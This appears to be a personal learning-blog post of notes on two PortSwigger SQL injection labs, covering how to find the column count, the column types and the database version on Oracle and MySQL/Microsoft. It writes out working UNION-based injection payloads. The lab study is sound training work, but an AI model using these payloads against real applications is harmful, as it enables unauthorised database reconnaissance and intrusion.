3. SQL Injection - Examining the Database - Versions

Examining the type of database and its details like version, how many tables and what the table holds is useful.


Cheat Sheet SQL Injection

https://portswigger.net/web-security/sql-injection/cheat-sheet


Do SQL Injection to retrieve the database version. 

(ORACLE)

Lab-07 - SQL injection attack, querying the database type and version on Oracle
(1) Determine the number of columns
' order by 3 -- -> internal server error
3 - 1 = 2
(2) Determine the data types of the columns
' UNION SELECT 'a', 'a' from DUAL-- -> Oracle database

(3) Output the version of the database
' UNION SELECT banner, NULL from v$version--
SELECT banner FROM v$version

(Microsoft/MySQL)

Using BURP Intruder and Repeater

Lab 08 - SQL injection attack, querying the database type and version on MySQL and Microsoft
SQL Injection - Product Category
End Goal - display the database version
Analysis:
(1) Find number of columns
' order by 3# -> internal server error
3 - 1 = 2
(2) Figure out which columns contain text
' UNION SELECT 'a', 'a'#
(3) Output the version
' UNION SELECT @@version, NULL#
SELECT @@version
8.0.23

Comments

Post a Comment

Popular posts from this blog

20. Data Analytics - Analyze Data to Answer Questions - Week 1

Goal of analysis is to identify trends and relationships within data so you can accurately answer the questions you're asking. Most data is organized in tables, always have data in the right format. Definition : Analysis // process used to make sense of the data collected Sorting // involves arranging data into a meaningful order to make it easier to understand, analyze, visualize Outliers // data points that are very different from similarly collected data and might not be reliable values Filtering // extracting specific data that meet certain criteria while hiding the rest Customized sort order // when you sort data in a spreadsheet using multiple conditions The 4 phases of analysis:          1. Organize data // getting the right data in the right size and order                     - Sorting : arrange data in meaningful order              ...
Read more

4. C# - List

 Lists: // are like array but flexible. arrays are fixed lengths while list can be flexible with adding and removing. List Declaring: List<dataType> variableName = new List<dataType>(); // initialize empty list List<int> variableName = new List<int>{5,1,3,5,3}; // initializes a filled list List Indexing: // Same as array listName[0]; List Methods: Add() Method: listVariable.Add(newValueToAdd); // adds a new value to the list at the end of the list Count Method: listVariable.Count; // returns the length of the list Insert() Method: listVariable.Insert(index, value); // inserts a value at a specified location, moving other values up/down to make space Remove() Method: listVariable.Remove(value); // removes the FIRST appearance of a value from the list RemoveAt() Method: listVariable.RemoveAt(index); // removes the value at the specified index Contains() Method: listVariable.Contains(valueToSearch); // returns true or false if found Clear() Method: listVariable...
Read more

14. Go - Methods and Pointers

Methods allow type structs defined in the func's receiver to access the func's stuff. Code Examples: package main import "fmt" type human struct { // struct     gender string     age int     weight float64 } /*func (a *human) printdetails() { // method     fmt.Printf("Name: Peter\nGender: %s\nAge: %d\nWeight: %g", a.gender, a.age, a.weight) }*/ func printdetails (a *human) { // non method     fmt. Printf ( "Name: Peter \n Gender: %s \n Age: %d \n Weight: %g " , a.gender, a.age, a.weight) } func main () {     var peter = new (human)     * peter = human{ "Male" , 30 , 50.00 }     //peter.printdetails() // Method     printdetails (peter) // Non method } // methods are functions of a struct/class // can take a pointer receiver for the struct or a value receiver.
Read more